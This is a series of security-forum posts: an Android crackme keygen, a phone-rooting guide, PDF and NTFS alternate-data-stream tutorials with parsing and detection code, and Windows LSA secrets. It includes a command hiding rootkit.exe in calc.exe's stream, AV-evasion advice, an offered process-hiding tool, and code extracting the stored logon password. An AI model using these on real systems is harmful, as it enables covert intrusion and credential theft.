Java's .class format - Google Project Hosting to convert classes.dex to classes.dex.dex2jar.jar. 
Open it in a Java decompiler and you can see much better output than dalvik disassembly. Please note that dex2jar is still in development phase and the output is meaningless at many places. This should be used only to get a quick understanding of all the functions. Conclusion In this introductory article, Dhanesh explains reversing Andriod using the emulator and all available tools in sequence with pictorial elaborative steps. It is mainly based to set up your ground for further reversing work on Andriod Platform. Well, thats it! We have analyzed an Android program and defeated its protection. Cheerio!
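The serial routine recovered from the smali above, carried through in Python so the worked values in "Decoding the Algorithm" can be checked. This is an added example, not the article author's code (he deliberately withholds his keygen); it assumes only what the listing shows: hw_id1 is the IMEI from getDeviceId() and hw_id2 the SIM serial from getSimSerialNumber().

```python
"""Serial routine of deurus' Android crackme 03, as read from the smali
walkthrough above. Added example, not the article author's keygen."""


def name_to_digits(name):
    """The crackme's 'exception trick': concatenate the decimal ASCII code of
    every character, so 'aaaa' becomes '97979797'."""
    return "".join(str(ord(c)) for c in name)


def compute_serial(name, hw_id1, hw_id2):
    """Build part1-part2-part3 the way the check routine does.
    hw_id1 is the IMEI (getDeviceId), hw_id2 the SIM serial (getSimSerialNumber)."""
    if len(name) < 4:
        raise ValueError("Min 4 chars")          # the first pop-up in the app
    # Part 1: first five digits of the expanded name, XORed with 0x6B016.
    part1 = int(name_to_digits(name)[:5]) ^ 0x6B016
    # Part 2: first six characters of each hardware id, parsed as integers and XORed.
    # Integer.parseInt throws on non-digit ids; int() raising ValueError is faithful to that.
    part2 = int(hw_id1[:6]) ^ int(hw_id2[:6])
    # Part 3: first six characters of the IMEI, appended verbatim (leading zeros kept).
    part3 = hw_id1[:6]
    # StringBuilder formats part1 and part2 as plain integers, hence no zero padding.
    return "%d-%d-%s" % (part1, part2, part3)


def check_serial(name, hw_id1, hw_id2, entered):
    """Mirror of the final String.equals(): True for a matching serial, otherwise
    the app would show 'Bad boy'."""
    return compute_serial(name, hw_id1, hw_id2) == entered
```

Running compute_serial("aaaaa", "0000000000000000", "89014103211118510720") reproduces the article's 511661-890141-000000, which is the quickest way to confirm that the XOR constant and the substring offsets were read correctly from the disassembly.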
  20. I'd say that since it has pictures anyway, it's worth reading...

Author: Dangwal

Introduction

In this exciting tutorial Dangwal explains how he rooted (jail-breaking in the Apple world) an HTC Wildfire to get rid of the old Android 2.2.1 and install the latest Android 2.3 version. Here is the fun game in his own words with beautiful illustrations.

Some time ago I got an HTC Wildfire and was having loads of fun using it, but every time I wanted to do anything more "creative" I was stopped by the bound nature of the phone, hence I decided to root it (jailbreak it, Apple fellas) and get complete control over my device. Here, I am covering a step by step guide to root HTC Wildfire 2.2.1 and install Android 2.3 on the HTC Wildfire. To do the rooting you must have your Wildfire with S-OFF, HBOOT 1.02.0002 and Android 2.2.1. You can check it by booting into HBOOT (power on your phone by holding the VOLUME DOWN + POWER button). This method is strictly for the 2.2.1 owners. How you turn S-OFF is your headache; you can try alpharev (ask the team if they can get you a 2.0 test version...) or you can wait for Unrevoked 3.33 or you can straight off go to the market and hunt for an XTC clip. Either way, try it and don't attempt anything before you get S-OFF. Actually the notorious S-ON flag is the reason rooting the Wildfire is such a pain in the a**.

Before & After the "Root HTC & Run Android Game"

Before I had this one (HTC Wildfire with Android 2.2.1). After this game, I converted it to like this with the latest Android 2.3 or better.

Disclaimer

This tutorial is intended for educational purposes only and the author or the publisher or this site can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other, creative application of this tutorial. In any case you disagree with the above statement, please stop here.

Requirements

Before we begin, you need the following things in place:
HTC Wildfire with S-OFF, HBOOT 1.01.0002, OS Froyo 2.2.1
USB Drivers: http://downloads.unrevoked.com/recovery/android-usb-driver.zip
RUU Rom 2.1/RUU_Buzz_HTC_WWE_1.14.405.2_R_Radio_13.45.55.24_3.35.15.31_release_130814_signed: Shipped ROMs
Unrevoked 3.2 Test version: unrEVOked-3-2-Windoze.exe - download now for free. File sharing. Software file sharing. Free file hosting. File upload. FileFactory.com
Cyanogenmod 7: http://download.cyanogenmod.com/get/update-cm-7.0.0-buzz-signed.zip and Google Apps: http://android.d3xt3r01.tk/cyanogen/gapps/gapps-gb-20110307-signed.zip
Time and Patience & last but not least, Balls of Steel

Starting with 'Root HTC & Run Android Game'

Once the ground is set, we can now move on to the step by step instructions with illustrations to finally root the HTC and get the latest Android 2.3 on it.

Step 1 - Installing the USB drivers

Download the USB drivers and extract them on the desktop. Turn off your Wildfire and boot into HBOOT by holding the VOLUME DOWN + POWER button. Connect your phone to your PC and it will show "drivers installing" or similar for the Android device. When prompted, install the drivers by going to Device Manager and browsing to the folder where you extracted the drivers. Once installed, disconnect and reboot your phone normally. Now you need to install the Android bootloader interface. Connect your HTC Wildfire to the PC and it will ask for drivers again. Now go to Device Manager, click on unknown device, click on update driver -> install from specific location -> No, I will choose to install -> choose Android phone and click on adb interface -> click next -> when asked to install click on continue anyway, just install them. Once done you will see your phone recognized as "Android bootloader interface". Now disconnect your phone and go into settings -> applications -> development -> enable USB Debugging. Congratulations, the first step is completed now.

Step 2 - Downgrading from Android 2.2.1 Froyo to Android 2.1 Eclair

Download the RUU rom which is an original stock rom. Plug your phone into the PC and set it to "Charge through USB". Double click the RUU rom .exe. Follow the on screen instructions and then let it install. Your phone will reboot into stock HTC 2.1. This will be the last time you will be seeing it though. The HBOOT version will now be 0.80.0002 (check it by powering on your phone by holding the VOLUME DOWN + POWER button). Once done disconnect your phone.

Step 3 - Gaining root using UnrEVOked

Download the test version of unrevoked. Let me repeat, DO NOT USE UNREVOKED 3.32 as it will lead to CID errors or to be precise this error "validation error backup cid is missing". This may be caused as 3.32 does not support HBOOT 0.82.0002. Hence you need the specific test version of Unrevoked 3.2 to do the job. Download it, save it on the desktop, and run it. Now connect your phone and the rooting will start. Once done, you will have ClockworkMod recovery installed on your phone. Reboot your phone now (using the VOLUME UP/DOWN key for navigation and clicking using the TRACKBALL; the POWER button takes you back in menus). Once rebooted, you will see the superuser app in your phone and congratulations, your phone is successfully rooted.

Step 4 - Installing Cyanogenmod 7 or Android Gingerbread 2.3.3

Download Cyanogenmod 7 with Google Apps and save it on the desktop, connect your phone as a USB disk drive and transfer both zip files to the SD card. Once done, reboot your phone into ClockworkMod Recovery (boot by holding the VOLUME DOWN + POWER button and clicking on recovery). Once the device boots into ClockworkMod Recovery, use the side VOLUME buttons to move around, and either the POWER button or the TRACKBALL to select.
Select the option to Wipe data/factory reset.
Then select the option to Wipe cache partition.
Select Install zip from sdcard.
Select Choose zip from sdcard.
Choose update-cm-7.0.0-buzz-signed.zip & let it install.
Once done, select Install zip from sdcard. Select Choose zip from sdcard, choose gapps-gb-20110307-signed.zip.
Once the installation has finished, get back to the main menu by clicking the POWER button and select the Reboot system now option.

Congratulations! Now your HTC Wildfire should boot into CyanogenMod as shown in the screen below. Finally r00ted.

Acknowledgements

Special thanks to 3xeno. Greetz fly to Singla | Parul | Nilesh | Satwik Bhai | Broken Angel | Rahul Bhai

So, did you understand anything?? Read it once more.
  21. Off: I am @IceyJoke, kw changed my name because I asked him to. Yes @paul, that's what I do, I like programming for Windows and that's it. And yes, that's right, I apologize @staticwater, I was late because I made a topic with a PDF and it took some time; here is a link....it's among the first versions, this one was made for RST to show nytro that I'm not just anybody talking nonsense....long story. It doesn't have many functions, I removed some of them and left just enough to hide one process: explorer.exe. Now I have to mention this version....it's no longer good for anything to me (I have another one), even so I'm not giving out the source code...too much of a brain-fuck for it. Even so it is detected by pretty much all AVs with all kinds of names, which made me laugh the first time :)) Although it is detected, it still does its job. When you open the application, it will hide explorer.exe; when you close it [X] it will bring explorer.exe back in Task Manager...or any other one. It doesn't contain any kind of virus or anything else apart from STRICTLY what I said it does. GirlShare - Download Sev7n.Sins.exe have fun. I have no idea what else it runs on; I tested it on XP SP3 just now and it works like a charm. I don't want PMs with "give me the source" please, because I'm getting desperate. I post threads so you learn something...you can ask for advice, not spoon-feeding!!!
  22. Author: Anand

Looks like a lot to read, but it isn't; the time will go by quickly.

Introduction

Portable Document Format (PDF) is a file format for representing documents in a manner independent of the application software, hardware, and operating system used to create them and of the output device on which they are to be displayed or printed. In this introductory article I will explain the internals of a PDF document, its structures and components with examples and screenshots. It will help you understand the intrinsics of a PDF document and will be more useful if you are into PDF malware analysis.

Components of PDF File

PDF syntax consists of four main components:
1. Objects
2. File Structure
3. Document Structure
4. Content Stream

PDF Objects

A PDF file consists primarily of objects, of which there are eight types:
1. Boolean values, representing true or false
2. Numbers, including integer and real
3. Strings
4. Names
5. Arrays, ordered collections of objects
6. Dictionaries, collections of objects indexed by Names
7. Streams, usually containing large amounts of data
8. The null object, denoted by the keyword null

I will explain each of these objects in more detail in the following section.

PDF Objects -> Strings

String objects can be represented in two ways:
Literal Strings
Hexadecimal Strings

Literal Strings consist of any number of characters between opening and closing parentheses. Example:
(This is a string objects)
If a string is too long then it can be represented using a backslash as shown below:
(This is a very long\
String.)
Hexadecimal Strings consist of hexadecimal characters enclosed in angle brackets. Example:
<A0C1D2E3F1>
Here each pair of hexadecimal digits defines one byte of the string.

PDF Objects -> Names

A name object is uniquely defined by a sequence of characters. The slash character (/) defines a name. Example:
/secsavvy
/SecSavvy
Both are different names.
/Sec#20Savvy means Sec Savvy; 20 is the hexadecimal value for white space.
Note: PDF is case-sensitive.

PDF Objects -> Array

An array object is a collection of objects. A PDF array object can be heterogeneous. It is defined with square brackets. Example:
[1 (string) /Name 3.14]

PDF Objects -> Dictionary

A dictionary object consists of pairs of objects. The first element is the key and the second is the value. The key must be a name. A dictionary is written as a sequence of key-value pairs enclosed in double angle brackets (<< ... >>). Example:
<< /Type /Pages /Kids [ 4 0 R ] /Count 1 >>
Count is a key and 1 is the value.

PDF Objects -> Streams

A stream object, like a string object, is a sequence of bytes. A stream can be of unlimited length, whereas a string is subject to an implementation limit. For this reason, objects with potentially large amounts of data, such as images and page descriptions, are represented as streams. A stream consists of a dictionary followed by zero or more bytes bracketed between the keywords stream and endstream:
dictionary
stream
... Zero or more bytes ...
endstream

PDF Objects -> Indirect Ones

Objects may be labeled so that they can be referred to by other objects. A labeled object is called an indirect object. Example (obj and endobj are keywords):
10 0 obj
(SecSavvy String)
endobj
This object defines a string with object number 10. This object can be referred to in the file by the indirect reference 10 0 R.

PDF Objects -> Streams -> Filters

A filter is an optional part of the specification of a stream, indicating how the data in the stream must be decoded before it is used. For example, if a stream has an ASCIIHexDecode filter, an application reading the data in that stream will transform the ASCII hexadecimal-encoded data in the stream into binary data. Data encoded using LZW and ASCII base-85 encoding (in that order) can be decoded using the following entry in the stream dictionary:
/Filter [ /ASCII85Decode /LZWDecode ]
Example:
1 0 obj
<< /Length 534 /Filter [ /ASCII85Decode /LZWDecode ]>>
stream
J..)6T`?p&<!J9%_[umg"B7/Z7KNXbN'S+,*Q/&"OLT'FLIDK#!n`$"<Atdi`\Vn%b%)&'cA*VnK\CJY(sF>c!Jnl@RM]WM;jjH6Gnc75idkL5]+cPZKEBPWdR>FF(kj1_R%W_d&/jS!;iuad7h?[L-F$+]]0A3Ck*$I0KZ?;<)CJtqi65XbVc3\n5ua:Q/=0$W<#N3U;H,MQKqfg1?:lUpR;6oN[C2E4ZNr8Udn.'p+?#X+1>0Kuk$bCDF/(3fL5]Oq)^kJZ!C2H1'TO]Rl?Q:&?<5&iP!$Rq;BXRecDN[iJB`,)o8XJOSJ9sDS]hQ;Rj@!ND)bD_q&C\g:inYC%)&u#:u,M6Bm%IY!Kb1+?:aAa?S`ViJglLb8<W9k6Yl\\0McJQkDeLWdPN?9A?jX*al>iG1p&i;eVoK&juJHs9%;Xomop?5KatWRT?JQ#qYuL,JD?M$0QP)lKn06l1apKDC@\qJ4B!!(5m+j.7F790m(Vj88l8Q:_CZ(Gm1%X\N1&u!FKHMB~>
endstream
endobj

Here is the list of standard filters:
ASCIIHexDecode
ASCII85Decode
LZWDecode
FlateDecode
RunLengthDecode
CCITTFaxDecode
JBIG2Decode
DCTDecode
JPXDecode
Crypt

File Structure

A PDF file consists of 4 main elements:
A PDF header identifying the PDF specification.
A body containing the objects that make up the document contained in the file.
A cross-reference table containing information about the indirect objects in the file.
A trailer giving the location of the cross-reference table and of certain special objects within the body of the file.

Cross Reference Table

The cross-reference table contains information that permits random access to indirect objects within the file so that the entire file need not be read to locate any particular object. The table contains a one-line entry for each indirect object, specifying the location of that object within the body of the file. Each cross-reference section begins with a line containing the keyword xref. Following this line are one or more cross-reference subsections, which may appear in any order. Each cross-reference subsection contains entries for a contiguous range of object numbers. The subsection begins with a line containing two numbers separated by a space: the object number of the first object in this subsection and the number of entries in the subsection. For example, the line 0 8 introduces a subsection containing five objects numbered consecutively from 0 to 8.
xref
0 8
0000000000 65535 f
0000000009 00000 n
0000000074 00000 n
0000000120 00000 n
0000000179 00000 n
0000000364 00000 n
0000000466 00000 n
0000000496 00000 n
0000000009 is the 10-digit byte offset in the case of an in-use entry, giving the number of bytes from the beginning of the file to the beginning of the object.
0000000000 is the 10-digit object number of the next free object in the case of a free entry.

Example Screenshots: Simple Hello World Text PDF

Here are the series of screenshots which show the different parts of the sample PDF document.

Conclusion

This article explains in brief the internals of a PDF document, its structures and components with examples and detailed screenshots. Hope this article http://www.aiim.org/documents/standards/PDF-Ref/References/Adobe/PDFReference17.pdf will help you in the malware research work revolving around PDF documents. Though it is enough for beginners, advanced users are advised to read through the reference white paper for more granular details.
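The file structure described in the article (header, body, xref table, trailer) and the ASCIIHexDecode filter, put together in one runnable Python example. This is added code, not from the article; the one-page PDF it builds is constructed here so that the xref offsets can be computed and then verified, which is exactly the check an analyst runs first on a suspicious PDF whose table has been left stale or bogus on purpose. Generation numbers are assumed to be 0 throughout.

```python
"""Build a minimal PDF, then parse its xref/trailer and decode a filtered
stream. Added example; the document is constructed inline, not taken from
the article's screenshots. Generation numbers are assumed to be 0."""
import binascii
import re


def build_minimal_pdf():
    """Assemble a one-page PDF, recording the byte offset of every 'N 0 obj'."""
    # Page content, stored hex-encoded so a reader must apply the filter.
    content = b"BT /F1 24 Tf 72 720 Td (Hello World) Tj ET"
    hexdata = binascii.hexlify(content).upper() + b">"   # '>' is the filter's EOD marker
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [ 3 0 R ] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>",
        b"<< /Length %d /Filter /ASCIIHexDecode >>\nstream\n" % len(hexdata)
        + hexdata + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.4\n")                 # header: 9 bytes, so object 1 sits at offset 9
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)    # one subsection: objects 0..N
    out += b"0000000000 65535 f \n"                # entry 0: head of the free list
    for off in offsets:
        out += b"%010d 00000 n \n" % off           # 10-digit offset, generation, in-use flag
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % (len(objects) + 1)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_pos  # trailer points back at the table
    return bytes(out)


def parse_xref(pdf):
    """Follow startxref to the table and return {obj_num: (offset, in_use)}."""
    m = re.search(rb"startxref\s+(\d+)\s+%%EOF", pdf)
    if not m:
        raise ValueError("no startxref/%%EOF trailer")
    xref_pos = int(m.group(1))
    sub = re.match(rb"xref\s+(\d+)\s+(\d+)\s+", pdf[xref_pos:])
    if not sub:
        raise ValueError("startxref does not point at an xref subsection")
    first, count = int(sub.group(1)), int(sub.group(2))
    pos = xref_pos + sub.end()
    entries = {}
    for i in range(count):
        offset, _gen, kind = pdf[pos:pos + 20].split()[:3]   # every entry is exactly 20 bytes
        entries[first + i] = (int(offset), kind == b"n")
        pos += 20
    return entries


def load_object(pdf, entries, num):
    """Jump to the xref offset and return the bytes between 'N 0 obj' and 'endobj'."""
    offset, in_use = entries[num]
    if not in_use:
        raise KeyError("object %d is on the free list" % num)
    head = b"%d 0 obj" % num
    if not pdf.startswith(head, offset):
        raise ValueError("xref offset %d does not point at %r" % (offset, head))
    end = pdf.index(b"endobj", offset)
    return pdf[offset + len(head):end].strip()


def verify_xref(pdf):
    """Object numbers whose in-use offset does not land on 'N 0 obj'.
    A non-empty list means the table is stale or deliberately wrong."""
    return [num for num, (off, used) in parse_xref(pdf).items()
            if used and not pdf.startswith(b"%d 0 obj" % num, off)]


def decode_stream(obj):
    """Extract stream data and apply ASCIIHexDecode when the dictionary names it."""
    m = re.search(rb"<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", obj, re.S)
    if not m:
        raise ValueError("object is not a stream")
    dictionary, data = m.group(1), m.group(2)
    if b"/ASCIIHexDecode" in dictionary:
        hexpart = b"".join(data.split(b">")[0].split())   # stop at '>', drop whitespace
        if len(hexpart) % 2:
            hexpart += b"0"                    # an odd final digit is padded with 0
        return binascii.unhexlify(hexpart)
    return data
```

Note that load_object trusts the xref offset only after checking that the bytes there really read "N 0 obj"; malformed PDFs commonly keep a plausible-looking table that points nowhere, which is why readers fall back to scanning the body for obj keywords and why verify_xref is a useful first triage step.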
  23. Static, I disagree with you; I'd say read my topic about data streams so you understand roughly what the deal is with rootkits. And let me tell you one more thing about invisible processes: I have a program I made myself which, although it is now detected by AVs, still hides processes so well that nothing detects them. I tested with n tools, so you can't say that it detects every method; there are others that do the same.... Methods would be to bypass the AVs; I read an article that was rather poorly done...anyway the guy explains more or less clearly how he uses CreateProcess, CreateRemoteThread and MoveMemory to do all this. Anyway, my opinion: I still stick to the idea that if I hide the process well, free the DLL I have no use for, also use NTFS data streams (ADS), do some multithreading if needed and a bit of ACL/DACL, there's nothing you can do about it. Well, the multithreading and freeing the .dll aren't even needed as long as you have them in data streams and ACL/DACL. Of course the short version is still a crypter ;)) Please contradict me if I'm not right; I don't remember for sure, but how does McAfee scan password-protected archives??
  24. What is an Alternate Data Stream (ADS)?

Alternate Data Stream (ADS) is a lesser known feature of the Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. Any such stream associated with a file/folder is not visible when viewed through conventional utilities such as Windows Explorer or the DIR command or any other file browser tools. It is used legitimately by Windows and other applications to store additional information (for example summary information) for the file. Even 'Internet Explorer' adds the stream named 'Zone.Identifier' to every file downloaded from the internet. Due to this hidden nature of ADS, hackers have been exploiting this method to secretly store their Rootkit components on the compromised system without being detected. For example, the infamous Rootkit named 'Mailbot.AZ' aka 'Backdoor.Rustock.A' used to hide its driver file in the system32 folder (C:\Windows\system32) as a stream '18467'.

Playing with ADS

It is easy to create alternate data streams for a file or folder. Here are the simple commands (use the cmd prompt to launch these commands):
Create a simple text stream:
type c:\test.txt > c:\windows\system32\calc.exe:test.txt
View it using notepad:
c:\notepad.exe c:\windows\system32\calc.exe:test.txt
Hiding rootkit.exe as a stream within the Windows calculator:
type c:\rootkit.exe > c:\windows\system32\calc.exe:rootkit.exe
Here is the screenshot showing the above steps in execution. Note that there is no change in the size of calc.exe even after adding the stream file to it. These characteristics make the streams a hidden threat.

Program to Enumerate Streams

Here is the short demo program which enumerates all the streams within the given file or folder.

#include <windows.h>
#include <stdio.h>
#include <string.h>

void EnumStreams(char *strFilePath)
{
    PVOID streamContext = 0;
    DWORD dwReadBytes, seek_high;
    WIN32_STREAM_ID streamHeader;
    WCHAR strStreamName[MAX_PATH];
    char strBuffer[1024];
    //size of the fixed part of WIN32_STREAM_ID (everything before cStreamName)
    DWORD dwHeaderSize = (DWORD)((LPBYTE)&streamHeader.cStreamName - (LPBYTE)&streamHeader);

    //Open the file for stream enumeration
    HANDLE hFile = CreateFileA(strFilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
                               OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
    if( hFile == INVALID_HANDLE_VALUE )
    {
        printf("Failed to open the file %s, Error=0x%.8x", strFilePath, GetLastError());
        return;
    }

    while(1)
    {
        //check if we have reached the end of file
        if( FALSE == BackupRead(hFile, (LPBYTE)&streamHeader, dwHeaderSize,
                                &dwReadBytes, FALSE, FALSE, &streamContext) )
        {
            break;
        }

        //check if we have read the stream header properly (zero bytes means no more streams)
        if( dwReadBytes != dwHeaderSize )
            break;

        //we are interested only in alternate data streams
        if( streamHeader.dwStreamId == BACKUP_ALTERNATE_DATA )
        {
            if( streamHeader.dwStreamNameSize != 0 )
            {
                //the stream name (in bytes, UTF-16) follows the header immediately
                if( BackupRead(hFile, (LPBYTE)strStreamName, streamHeader.dwStreamNameSize,
                               &dwReadBytes, FALSE, FALSE, &streamContext) )
                {
                    strStreamName[streamHeader.dwStreamNameSize/2] = L'\0';
                    //Reformat the stream file name ... :stream.txt:$DATA
                    sprintf_s(strBuffer, 1024, "%S", &strStreamName[1]);
                    char *ptr = strchr(strBuffer, ':');
                    if( ptr != NULL )
                        *ptr = '\0';
                    printf("\n Found Stream - %s", strBuffer);
                }
            }
        }

        // jump to the next stream header
        if( BackupSeek(hFile, ~0, ~0, &dwReadBytes, &seek_high, &streamContext) == FALSE )
        {
            //for any errors other than seek break out of loop
            if( GetLastError() != ERROR_SEEK )
            {
                // terminate BackupRead() loop
                BackupRead(hFile, 0, 0, &dwReadBytes, TRUE, FALSE, &streamContext);
                break;
            }

            //could not seek over the whole stream, so read the remaining stream data manually
            streamHeader.Size.QuadPart -= dwReadBytes;
            streamHeader.Size.HighPart -= seek_high;
            BYTE buffer[4096];
            while( streamHeader.Size.QuadPart > 0 )
            {
                //never read past the end of this stream, or the next header is consumed as data
                DWORD dwToRead = (streamHeader.Size.QuadPart < (LONGLONG)sizeof(buffer)) ?
                                 (DWORD)streamHeader.Size.QuadPart : (DWORD)sizeof(buffer);
                if( !BackupRead(hFile, buffer, dwToRead, &dwReadBytes, FALSE, FALSE, &streamContext)
                    || dwReadBytes == 0 )
                {
                    break;
                }
                streamHeader.Size.QuadPart -= dwReadBytes;
            } //end of inner while loop
        } //end of 'jump to next stream' if block
    } //main while loop

    //Finally clean up the buffers used for seeking
    if( streamContext )
        BackupRead(hFile, 0, 0, &dwReadBytes, TRUE, FALSE, &streamContext);
    CloseHandle(hFile);
    return;
}

The above program initially opens the input file using FILE_FLAG_BACKUP_SEMANTICS for reading streams. Next it calls the BackupRead function to read the stream header. If the header contains the flag BACKUP_ALTERNATE_DATA then it points to a hidden stream file. In such a case it proceeds to read the stream file name which is present after the stream header. After that it moves the file pointer to the next stream header through the BackupSeek function. The same process is repeated until all streams present in the specified file are discovered. Also note that the same program can be used to detect streams within folders as well.

Well Known Alternate Data Streams

There are numerous applications including Windows which internally use alternate data streams for various purposes. Here are some of the well known streams:
* SummaryInformation
This stream is created by Windows when the user updates the summary information for the file.
* DocumentSummaryInformation
This stream is created by Windows when the user updates the summary information for the file.
* {4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
This is a stream with zero size created by Windows when the user updates the summary information for the file.
* Zone.Identifier
This is another well known stream created by Internet Explorer for every downloaded file. It is basically a text stream with a size normally less than 50 bytes.
* encryptable
This is a stream with zero size attached to the file 'Thumbs.db'.
* favicon
This is an icon stream attached to the favorite links stored by Internet Explorer.
* AFP_AfpInfo
This is a stream of icon type belonging to the Macintosh system.
In addition to legitimate programs, it is also being used by malicious Rootkit programs such as Mailbot.AZ, Trojan.Win32.Agent.alt etc. to hide their drivers.

Conclusion

In short, ADS not only makes it easy for Rootkit programs to hide themselves but also provides a covert launch pad to execute stealthily without making noise. Only sophisticated tools such as StreamArmor will greatly help in uncovering and destroying such hidden threats.
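The same enumeration as the BackupRead program, done from Python through the kernel32 FindFirstStreamW/FindNextStreamW API, with the "well known streams" list above used to separate expected names from ones that deserve a look. This is an added example and not the article's code; the kernel32 calls only run on Windows, while the name parsing and the triage are plain Python. The sample stream list in the test is constructed.

```python
"""Enumerate the alternate data streams of a file or folder via
FindFirstStreamW and sort them into expected and unexpected names.
Added example, not the article's code. Windows-only for the API part."""
import ctypes
import sys

MAX_PATH = 260
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FIND_STREAM_INFO_STANDARD = 0          # the FindStreamInfoStandard info level

# Stream names the article lists as created by Windows, IE and Mac software.
# On disk the two property-set streams carry a leading \x05 in their name.
WELL_KNOWN = {
    "SummaryInformation", "DocumentSummaryInformation",
    "{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}", "Zone.Identifier",
    "encryptable", "favicon", "AFP_AfpInfo",
}


class WIN32_FIND_STREAM_DATA(ctypes.Structure):
    _fields_ = [("StreamSize", ctypes.c_longlong),
                ("cStreamName", ctypes.c_wchar * (MAX_PATH + 36))]


def parse_stream_name(raw):
    """Split ':name:$DATA' (the form the API returns) into (name, kind).
    The unnamed default stream is '::$DATA' and gives ('', '$DATA')."""
    if not raw.startswith(":"):
        raise ValueError("unexpected stream name %r" % raw)
    name, _, kind = raw[1:].partition(":")
    return name, kind


def enum_streams(path):
    """Return [(name, size_in_bytes), ...] for every named $DATA stream of path."""
    if sys.platform != "win32":
        raise OSError("alternate data streams need NTFS on Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    pdata = ctypes.POINTER(WIN32_FIND_STREAM_DATA)
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int, pdata, ctypes.c_uint32]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, pdata]
    k32.FindClose.restype = ctypes.c_int
    k32.FindClose.argtypes = [ctypes.c_void_p]

    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, FIND_STREAM_INFO_STANDARD, ctypes.byref(data), 0)
    if handle is None or handle == INVALID_HANDLE_VALUE:
        raise ctypes.WinError(ctypes.get_last_error())
    found = []
    try:
        while True:
            name, kind = parse_stream_name(data.cStreamName)
            if name and kind == "$DATA":          # skip the unnamed main stream
                found.append((name, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                break                             # ERROR_HANDLE_EOF: no more streams
    finally:
        k32.FindClose(handle)
    return found


def triage(streams):
    """Split (name, size) pairs into (expected, unexpected). The unexpected list
    is what a responder looks at first: a driver-sized stream with a name like
    '18467' on a system32 file is the Rustock pattern described above."""
    expected, unexpected = [], []
    for name, size in streams:
        bucket = expected if name.lstrip("\x05") in WELL_KNOWN else unexpected
        bucket.append((name, size))
    return expected, unexpected


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\system32\calc.exe"
    known, odd = triage(enum_streams(target))
    for name, size in known:
        print("known stream %-40s %d bytes" % (name, size))
    for name, size in odd:
        print("UNEXPECTED   %-40s %d bytes" % (name, size))
```

FindFirstStreamW works on directories as well as files, so the same function covers the folder case the article mentions. Size is worth keeping in the report: a zero-byte {4c8cc155-...} stream is routine, while a stream of several hundred kilobytes attached to a system binary is not.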
  25. Introduction

Windows provides Security Management functions for managing various Windows secrets. One such function is LsaRetrievePrivateData which retrieves various secret data from the system policy that has been previously stored using the function LsaStorePrivateData. One of the secrets stored by this function is the 'DefaultPassword'. All this secret information is stored in encrypted format at a system location in the registry. Normally these registry keys are not visible even if you run regedit as administrator. You need to use one of the techniques described in this article http://rstcenter.com/forum/36405-discovering-hidden-registry-keys-windows.rst#post246503 to view these secret keys. Here is the screenshot of Regedit.exe running under the system account showing the 'DefaultPassword' secret key. There are lots of other Lsa secret strings which are present at the registry location below:
HKEY_LOCAL_MACHINE\Security\Policy\Secrets

Using LsaRetrievePrivateData to get 'DefaultPassword'

We don't have to manually decrypt this 'DefaultPassword' value from the registry to get the clear text password. The LsaRetrievePrivateData function does it in style without much work. Here is the code snippet which illustrates how to use LsaRetrievePrivateData to retrieve the default logon password. Before we begin, we need to open a handle to the LSA policy.

#include <windows.h>
#include <ntsecapi.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif

LSA_HANDLE hLsaPolicy = NULL;
LSA_OBJECT_ATTRIBUTES ObjAttributes;
ZeroMemory(&ObjAttributes, sizeof(ObjAttributes));   //the attributes must be zeroed before use

//Open the handle to LSA Policy
if( LsaOpenPolicy(NULL, &ObjAttributes, POLICY_ALL_ACCESS, &hLsaPolicy) != STATUS_SUCCESS )
{
    printf("\n LsaOpenPolicy failed");
    return;
}

Once the handle is opened, proceed to retrieve the default password by directly invoking the function LsaRetrievePrivateData:

PLSA_UNICODE_STRING privateData = NULL;
WCHAR wstrKeyName[] = L"DefaultPassword";
LSA_UNICODE_STRING keyName;
keyName.Buffer = wstrKeyName;
keyName.Length = (USHORT)(wcslen(wstrKeyName) * sizeof(WCHAR));
keyName.MaximumLength = (USHORT)((wcslen(wstrKeyName) + 1) * sizeof(WCHAR));
if( LsaRetrievePrivateData(hLsaPolicy, &keyName, &privateData) != STATUS_SUCCESS )
{
    printf("LsaRetrievePrivateData failed");
    LsaClose(hLsaPolicy);
    return;
}

On successful execution, display the retrieved default password, free the LSA buffer and close the handle:

//the returned buffer is not guaranteed to be NUL-terminated, so print exactly Length bytes
printf("\n Success : default password is %.*S (%d)", privateData->Length / sizeof(WCHAR), privateData->Buffer, privateData->Length);
LsaFreeMemory(privateData);
LsaClose(hLsaPolicy);

This is straightforward code to get the 'defaultpassword'. Also note that you need to have administrator privileges for this code to execute successfully.

Conclusion

Though this method is deprecated from XP onwards, it still works even on Windows 7. However it does not necessarily have to be the current logon user's password, as there is only one 'DefaultPassword' setting for the entire system. Also it's not clear under what conditions this password gets saved and which password gets stored. Though it's not a reliable method for applications to get the logon password, it may get you the right password sometimes.

References:
Security Management functions: Security Management Functions (Windows)
